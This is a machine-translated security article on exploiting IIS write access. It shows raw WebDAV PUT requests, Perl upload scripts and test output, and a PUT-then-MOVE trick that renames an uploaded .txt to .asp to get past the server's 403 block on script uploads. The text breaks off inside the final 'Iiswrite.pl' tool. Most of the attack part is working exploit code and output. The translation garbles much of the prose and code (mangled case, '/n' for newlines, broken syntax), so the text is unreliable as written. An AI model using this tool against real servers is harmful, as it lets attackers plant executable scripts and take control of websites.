Utilization of IIS write access (reproduced)

Author: SuperHei Source: www.4ngel.net

Everyone may have seen the "Remote Analysis IIS Settings", which analyzes the various settings of IIS. I will analyze the write permission of IIS. The following references "Remote Analysis IIS Settings" article pairs IIS write permission analysis content: Writing Permissions Test a directory for WEB users have write permissions, using the following methods: Telnet to the server's web port (80) and send a request: PUT /DIR/MY_FILE.TXT HTTP / 1.1 Host: Iis-Server Content-Length : 10 At this time, the server will return a 100 (continued) information: http / 1.1 100 Continue Server: Microsoft-IIS / 5.0 Date: Thu, 28 Feb 2002 15:56:00 GMT Next, we enter 10 letters: Aaaaaaaaa sent out After this request, look at the server's return information, if it is a 201 Created response: http / 1.1 201 Created Server: Microsoft-IIS / 5.0 Date: THU, 28 Feb 2002 15:56:08 gmt location: http: // IIS- Server / Dir / My_File.txt Content-Length: 0 Allow: Options, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PUTPATCH, SEARCH, LOCK, UNLOCK, then explains the write authority of this directory is open , If it returns a 403 error, then write permissions are not started, if you need to authenticate, and return a 401 (permission prohibition) response, the description is to open permissions, but anonymous users are not allowed. If a directory has also opened "Write" and "Script and Executable Programs", then web users can upload a program and perform it, horror,% ^ # $! ~ This brief explanation: Put / Dir / my_file. TXT HTTP / 1.1 HOST: 10 PUT: Request the server to store the entity of the attachment in the provided request URL, if the request URL points to the resource already exists, the attachment entity should be seen as the current original The resource modified version of the server. If the request URL does not point to the existing resource, the URL will be defined by the requested user agent into a new resource, and the original server will use this URL to generate this resource.

Host: is the send address of the HTTP request. Content-length: is the length of the content, the length of the final value, the length of the uploaded file size is uniform, and we write a simple Perl program here to complete This complex submission process, when writing the code, we open the file with binmode (), the code is as follows: #! / Usr / bin / perl us :: socket; $ argc = @argv; if ($ argc! = 4) {Print "USAGE: $ 0 127.0.0.1 80 kaka.exe /scripts/file.exe/n"; exit;} $ host = @argv [0]; $ port = @argv [1]; $ file = @argv [ 2]; $ PATH = @argv [3]; @ s = stat ("$ file"); $ size = $ s [7]; # get file size Print "$ file size is $ size bytes / n"; My $ SOCK = IO :: Socket :: inet-> new (proto => "tcp", peeraddr => $ host, peerport => $ port) || DIE "Sorry! Could Not connect to $ host / n"; print $ SOCK "PUT $ PATH HTTP / 1.1 / N"; Print $ SOCK "Host: $ Host / N"; Print $ SOCK "Content-Length: $ size / n / n"; #sock connection open (file, "$ "); binmode (file); # with 2-way open file While (Read (File, $ Char, 1024)) {# read file data Upload Print $ SOCK" $ char ";} Print $ SOCK" / N / N "; @REQ = <$ sock>; print" please wait ... / n "; SLEEP (2); if ($ REQ [4] = ~ / 200 | 201 /) {print" Upfile succeed !! ! "; # 成 成 显示} else {print" Upfile faile !!! / n / n "; print @Req; # If the failed display returns an error} Close $ SOCK; CL OSE File; below We test: c: / usr / bin> Perl.exe Iiswt.pl 127.0.0.1 80 kaka.txt /scripts/kaka.txt kaka.txt size is 14 bytes please wait ... Upfile succeed !! ! C: / inetpub / scripts> Dir Kaka.txt The volume in the drive C does not have a label.

The serial number of the volume is 3cd1-479e c: / inetpub / scripts directory 2004-05-05 00:37 14 kaka.txt 1 file 14 bytes 0 directory 3,871,080,448 available bytes Here we have successfully uploaded Kaka.txt successfully Under the web directory Scripts, I use the binMode () mode (2) to open the file in the program, you should be able to upload other files, let us test the exe file: c: / usr / bin> Perl.exe Iiswt.pl 127.0. 0.1 80 Perl.exe /scripts/perl.exe Perl.exe Size Is 20535 BYTES PLEASE WAIT ... UPFILE SUCCEED !!! C: / INETPUB / SCRIPTS> DIR Perl.exe Drive C There is no label. The serial number of the volume is 3 cd1-479e c: / inetpub / scripts directory 2004-05-05 00:42 20,535 Perl.exe 1 file 20,535 bytes 0 directory 3,871,031,296 can be successful, can upload EXE, is it Can you upload any file? Then test the ASP file: c: / usr / bin> Perl.exe Iiswt.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp kaka.asp size is 4 bytes please wait ... Upfile faile !!! http / 1.1 100 Continue Server: Microsoft-IIS / 5.0 Date: Tue, 04 May 2004 16:45:51 GMT HTTP / 1.1 403 Forbidden Server: Microsoft-IIS / 5.0 Date: Tue, 04 May 2004 16:45:51 GMT Connection : Close Content-Type: TEXT / HTML Content-Length: 44

http / 1.1 403 forbidden failed! ! Tip http / 1.1 403 Forbidden error, it seems that it is not possible to write ASP directly in Post mode. If it is tested, it will generate an HTTP / 1.1 403 forbidden error. Then how can we upload the file type file supported by IIS? In addition to the action of PUT, POST, GET, IIS can execute commands, huh! We can first upload local ASP to other files such as TXT below the remote host web directory, and will be changed to the ASP. We still use NC to submit tests: D: /> NC 127.0.0.1 80 move /scripts/kaka.txt http / 1.1 host: http:0.1 destination: http://127.0.1/scripts/kaka.asp http / 1.1 201 Created Server: Microsoft-IIS / 5.0 Date: Sun, 05 Oct 2003 09:30:59 Gmt Location: http://127.0.0.1/scripts/x.asp content-type: text / xml content-length: 0 Successfully uses Move /scripts/kaka.txt to change the name /scripts/kaka.asp. This way we can combine PUT and MOVE to complete the IIS write easy file :). We still use Perl to do.

Test Write ASP Success: C: / USR / BIN> Perl Kaka.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp ***************************** ********************************************************** CODZ BY ≯superhei && LANKER ************************************************************ ************** Kaka.asp size is 4 bytes please wait ... Upfile succeed !!! MODIFYFILE SUCCEED !!! The final Iiswrite.pl code is as follows (when writing this article, In the Internet cafes, the code in the article is first, I am playing "Draft", and the LANKER test and finally completed, THX LANKER.

: #! / Usr / bin / perl #the Iiswrite Script Use IO :: Socket; $ argc = @argv; print "*" x 60; print "/ ncoDZ by ≯superhei && lanker / N "; Print" * "x 60," / n "; if ($ argc! = 4) {Print" USAGE: $ 0 127.0.0.1 80 kaka.txt /scripts/my_file.txt/n "; exit } $ host = @argv [0]; $ port = @argv [1]; $ path = @argv [3]; $ file = @argv [2]; @ Path = Split ("/", $ PATH) ; $ any = pop (@Path); $ PATH1 = JOIN ("/", @ path); @ s = stat ("$ file"); $ size = $ s [7]; print "$ FILE SIZE IS $ Size Bytes / N "; MY $ SOCK = IO :: Socket :: inet-> new (proto =>" tcp ", peeraddr => $ host, peerport => $ port) || Die" Sorry! Could Not connect To $ Host / N "; Print $ SOCK" PUT $ Path1 / Lanker.txt http / 1.1 / n "; Print $ SOCK" Host: $ Host / N "; Print $ SOCK" Content-Length: $ SIZE / N / N "; Open (File," $ file ") || Die" Can't Open $ file "; binmode (file); WHILE (READ (File, $ Char, 1024)) {Print $ SOCK" $ char ";} Print $ SOCK "/ N / N"; @REQ = <$ sock>; print "please wait ... / n"; SLEEP (2); if ($ REQ [4] = ~ / 200 | 201 /) { Print "Upfile succeed !!! / n";} else {print "Upfile Fai Le !!! / n ";} close $ sock; close file; my $ sock = io :: socket :: inet-> new (proto =>" tcp ", peeraddr => $ host, peerport => $ port) || DIE "Sorry! Could Not Connect to $ Host / N"; Print $ SOCK "Move $ Path1 / Lanker.txt HTTP / 1.1 / N"; Print $ SOCK "Host: $ Host / N"; Print $ SOCK " Destination: http: // $ host: $ port $ path / n / n / n / n "; @REQ = <$ sock>; if ($ re [0] =